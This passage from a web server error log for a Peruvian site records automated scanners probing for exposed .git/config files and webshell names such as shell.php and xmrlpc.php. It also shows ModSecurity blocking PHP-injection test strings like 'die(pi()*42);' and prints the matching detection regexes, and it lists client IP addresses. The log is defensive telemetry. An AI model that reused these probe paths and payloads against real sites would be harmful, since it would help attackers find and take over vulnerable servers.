[error] 28875#28875: *180631 access forbidden by rule, client: 54.227.20.68, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:10:20 [error] 28876#28876: *180632 access forbidden by rule, client: 54.227.20.68, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:13:14 [error] 28876#28876: *180635 access forbidden by rule, client: 52.87.250.17, server: investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:13:14 [error] 28876#28876: *180636 access forbidden by rule, client: 52.87.250.17, server: investigacionperu.com, request: "GET /cms/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:14:07 [error] 28876#28876: *180639 access forbidden by rule, client: 54.234.15.222, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:14:07 [error] 28876#28876: *180640 access forbidden by rule, client: 54.234.15.222, server: investigacionperu.com, request: "GET /admin/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:20:42 [error] 28876#28876: *180682 access forbidden by rule, client: 54.87.116.105, server: investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:20:42 [error] 28876#28876: *180683 access forbidden by rule, client: 54.87.116.105, server: investigacionperu.com, request: "GET /blog/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:30:15 [error] 28875#28875: *180716 access forbidden by rule, client: 52.87.250.17, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:30:15 [error] 28876#28876: *180717 access forbidden by rule, client: 52.87.250.17, server: investigacionperu.com, request: "GET /public/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:48:41 [error] 28876#28876: *181017 access forbidden by rule, client: 35.183.199.188, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 15:48:41 [error] 28875#28875: *181018 access forbidden by rule, client: 35.183.199.188, server: investigacionperu.com, request: "GET /wp-content/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 16:02:46 [error] 28876#28876: *181241 access forbidden by rule, client: 3.96.196.132, server: investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 16:02:46 [error] 28875#28875: *181242 access forbidden by rule, client: 3.96.196.132, server: investigacionperu.com, request: "GET /backup/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 16:08:49 [error] 28875#28875: *181383 access forbidden by rule, client: 18.234.31.9, server: investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/08 16:08:49 [error] 28875#28875: *181384 access forbidden by rule, client: 18.234.31.9, server: investigacionperu.com, request: "GET /static/.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Sep 08 21:22:25.464991 2024] [:error] [pid 28915:tid 140254631618304] [client 52.164.231.90:44906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Sun Sep 08 21:22:38.846185 2024] [autoindex:error] [pid 29820:tid 140254855866112] [client 52.164.231.90:44940] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:22:51.935571 2024] [autoindex:error] [pid 28914:tid 140254715545344] [client 52.164.231.90:44982] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:22:54.409825 2024] [autoindex:error] [pid 29820:tid 140254757508864] [client 52.164.231.90:44992] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:22:55.509300 2024] [:error] [pid 29820:tid 140254732330752] [client 52.164.231.90:44996] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Sep 08 21:22:58.645069 2024] [:error] [pid 28916:tid 140254673581824] [client 52.164.231.90:45006] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Sun Sep 08 21:23:11.103757 2024] [autoindex:error] [pid 28915:tid 140254855866112] [client 52.164.231.90:45038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:23:11.166955 2024] [:error] [pid 29820:tid 140254881044224] [client 52.164.231.90:45040] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sun Sep 08 21:23:11.995528 2024] [:error] [pid 28916:tid 140254855866112] [client 52.164.231.90:45044] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Sun Sep 08 21:23:31.529344 2024] [:error] [pid 29820:tid 140254665189120] [client 52.164.231.90:45090] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Sep 08 21:23:34.057206 2024] [:error] [pid 28915:tid 140254656796416] [client 52.164.231.90:45098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Sun Sep 08 21:23:38.430018 2024] [:error] [pid 28916:tid 140254855866112] [client 52.164.231.90:45110] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Sun Sep 08 21:23:47.415504 2024] [autoindex:error] [pid 28915:tid 140254640011008] [client 52.164.231.90:45130] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:23:53.656056 2024] [:error] [pid 28915:tid 140254623225600] [client 52.164.231.90:45152] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Sun Sep 08 21:24:11.051054 2024] [:error] [pid 29820:tid 140254715545344] [client 52.164.231.90:45190] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Sep 08 21:24:25.332200 2024] [:error] [pid 28916:tid 140254740723456] [client 52.164.231.90:45230] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Sep 08 21:24:25.396684 2024] [:error] [pid 28914:tid 140254872651520] [client 52.164.231.90:45232] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Sep 08 21:25:06.958356 2024] [autoindex:error] [pid 28915:tid 140254889436928] [client 52.164.231.90:45322] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:25:16.899524 2024] [autoindex:error] [pid 29820:tid 140254623225600] [client 52.164.231.90:45344] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:25:17.956399 2024] [autoindex:error] [pid 29820:tid 140254681974528] [client 52.164.231.90:45348] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Sep 08 21:25:19.962327 2024] [:error] [pid 29820:tid 140254864258816] [client 52.164.231.90:45354] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Sep 08 21:25:20.025443 2024] [:error] [pid 29820:tid 140254614832896] [client 52.164.231.90:45356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Sep 08 21:57:53.686468 2024] [:error] [pid 28915:tid 140254673581824] [client 144.126.128.225:45892] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zt5kMQjHVPv7EQeEt4UD1wAAAFE"], referer: www.google.com [Sun Sep 08 21:57:59.128144 2024] [:error] [pid 29820:tid 140254640011008] [client 144.126.128.225:45894] [client 144.126.128.225] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zt5kN3Ee57k-DeRiDm2c2QAAANU"], referer: www.google.com [Mon Sep 09 03:11:37.151819 2024] [ssl:warn] [pid 16883:tid 140076481505152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:11:37.453287 2024] [ssl:warn] [pid 16884:tid 140076481505152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:11:38.074726 2024] [ssl:warn] [pid 16884:tid 140076481505152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:11:40.354304 2024] [ssl:warn] [pid 16884:tid 140076481505152] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:11:42.717704 2024] [ssl:warn] [pid 17298:tid 140545177089920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:11:42.957755 2024] [ssl:warn] [pid 17299:tid 140545177089920] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 09 03:36:29.388192 2024] [autoindex:error] [pid 17316:tid 140544776808192] [client 40.80.160.119:51394] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 09 03:36:36.947643 2024] [autoindex:error] [pid 17318:tid 140544985949952] [client 40.80.160.119:51400] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 09 13:44:30.466134 2024] [:error] [pid 17948:tid 140544985949952] [client 13.82.134.132:34918] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Mon Sep 09 13:45:48.625620 2024] [:error] [pid 17948:tid 140544885913344] [client 13.82.134.132:34950] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Sep 09 13:54:28.019591 2024] [:error] [pid 17316:tid 140544793593600] [client 13.82.134.132:35234] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 09 14:06:46.706269 2024] [:error] [pid 17948:tid 140544743237376] [client 13.82.134.132:35646] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Sep 09 14:12:54.698268 2024] [:error] [pid 17319:tid 140544743237376] [client 13.82.134.132:35780] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Sep 09 14:15:46.075076 2024] [:error] [pid 17316:tid 140544743237376] [client 13.82.134.132:35848] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-aespa.php [Mon Sep 09 14:17:06.527384 2024] [:error] [pid 17948:tid 140544776808192] [client 13.82.134.132:35874] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-hudbud.php [Mon Sep 09 14:18:32.509819 2024] [:error] [pid 17319:tid 140544985949952] [client 13.82.134.132:35898] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/output.php [Mon Sep 09 14:20:54.272954 2024] [:error] [pid 17316:tid 140544977557248] [client 13.82.134.132:35938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell.php [Mon Sep 09 14:41:24.521729 2024] [:error] [pid 17319:tid 140544726451968] [client 13.82.134.132:36526] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Sep 09 14:43:10.605146 2024] [:error] [pid 17318:tid 140544869127936] [client 13.82.134.132:36562] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Sep 09 15:25:44.097959 2024] [:error] [pid 17948:tid 140544860735232] [client 13.82.134.132:37838] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Mon Sep 09 15:29:00.977094 2024] [:error] [pid 17948:tid 140544885913344] [client 13.82.134.132:38000] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/themes.php [Mon Sep 09 15:30:29.808528 2024] [:error] [pid 17948:tid 140544718059264] [client 13.82.134.132:38040] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php [Mon Sep 09 15:43:28.415220 2024] [:error] [pid 17318:tid 140544760022784] [client 13.82.134.132:38338] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Mon Sep 09 15:52:11.310670 2024] [:error] [pid 17318:tid 140544751630080] [client 13.82.134.132:38522] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Sep 09 15:57:57.213968 2024] [:error] [pid 17948:tid 140544969164544] [client 13.82.134.132:38842] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Mon Sep 09 16:04:03.734008 2024] [:error] [pid 17948:tid 140544810379008] [client 13.82.134.132:39176] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Sep 09 16:06:45.576027 2024] [:error] [pid 17319:tid 140544969164544] [client 13.82.134.132:39322] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Mon Sep 09 16:08:05.725952 2024] [:error] [pid 17319:tid 140544985949952] [client 13.82.134.132:39350] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Mon Sep 09 17:55:35.551413 2024] [:error] [pid 17319:tid 140544801986304] [client 85.55.247.47:41592] [client 85.55.247.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: print(md5(323));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/pixl-wpcom/inc/data.php"] [unique_id "Zt9852eJWjCEcQQv095THgAAAI4"], referer: investigacionperu.com [Mon Sep 09 17:56:36.699776 2024] [:error] [pid 17318:tid 140544801986304] [client 85.55.247.47:41600] [client 85.55.247.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: print(md5(323));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/booking-package/iconfont/More.php"] [unique_id "Zt99JFEeXDUsdg_WoavypwAAAE4"], referer: investigacionperu.com 2024/09/09 22:00:42 [error] 17184#17184: *199888 access forbidden by rule, client: 5.182.209.97, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/09 22:14:35 [error] 17183#17183: *200014 access forbidden by rule, client: 5.182.209.97, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/09 22:31:22 [error] 17184#17184: *200136 access forbidden by rule, client: 5.182.209.97, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Sep 10 03:11:36.772181 2024] [ssl:warn] [pid 10117:tid 140457011021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:11:37.023259 2024] [ssl:warn] [pid 10118:tid 140457011021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:11:37.643629 2024] [ssl:warn] [pid 10118:tid 140457011021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:11:39.981743 2024] [ssl:warn] [pid 10118:tid 140457011021696] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:11:42.399456 2024] [ssl:warn] [pid 10543:tid 140674660296576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:11:42.654273 2024] [ssl:warn] [pid 10544:tid 140674660296576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 10 03:39:26.407269 2024] [authz_core:error] [pid 10562:tid 140674338879232] [client 46.101.1.225:54254] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/10 03:39:31 [error] 10517#10517: *204061 access forbidden by rule, client: 46.101.1.225, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Sep 10 10:21:03.593024 2024] [:error] [pid 11178:tid 140674372450048] [client 45.227.254.34:60460] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:atime. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:atime: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gassembly/js/js.php"] [unique_id "ZuBj3xb8cwXGdpJbG4HgNgAAAMQ"] [Tue Sep 10 16:21:23.139651 2024] [authz_core:error] [pid 24434:tid 140674389235456] [client 167.99.182.39:37470] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/10 16:21:27 [error] 10517#10517: *210486 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Sep 11 03:10:39.648506 2024] [ssl:warn] [pid 9923:tid 140393689925504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:39.932173 2024] [ssl:warn] [pid 9924:tid 140393689925504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:40.541622 2024] [ssl:warn] [pid 9924:tid 140393689925504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:42.537681 2024] [ssl:warn] [pid 9924:tid 140393689925504] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:45.034279 2024] [ssl:warn] [pid 10341:tid 140700646049664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:45.357146 2024] [ssl:warn] [pid 10342:tid 140700646049664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 03:10:46.629334 2024] [ssl:warn] [pid 10342:tid 140700646049664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 11 11:10:46.124719 2024] [:error] [pid 10495:tid 140700301616896] [client 45.227.254.34:56848] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZuHBBnQHobYK5n_syU-kXQAAAEs"] [Wed Sep 11 23:32:38.780442 2024] [autoindex:error] [pid 10496:tid 140700377151232] [client 85.239.52.84:41858] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 11 23:32:49.743726 2024] [autoindex:error] [pid 10496:tid 140700259653376] [client 85.239.52.84:41878] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 11 23:32:51.901174 2024] [autoindex:error] [pid 10496:tid 140700242867968] [client 85.239.52.84:41882] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Sep 12 03:14:38.749801 2024] [ssl:warn] [pid 21341:tid 139746178668416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 03:14:39.018589 2024] [ssl:warn] [pid 21342:tid 139746178668416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 03:14:39.540341 2024] [ssl:warn] [pid 21342:tid 139746178668416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 03:14:42.296474 2024] [ssl:warn] [pid 21342:tid 139746178668416] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 03:14:44.621266 2024] [ssl:warn] [pid 21761:tid 140551727867776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 03:14:44.833499 2024] [ssl:warn] [pid 21762:tid 140551727867776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 12 06:24:56.084096 2024] [authz_core:error] [pid 22458:tid 140551378654976] [client 64.226.78.121:48032] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/12 06:25:00 [error] 21743#21743: *234009 access forbidden by rule, client: 64.226.78.121, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 12 09:41:48.621043 2024] 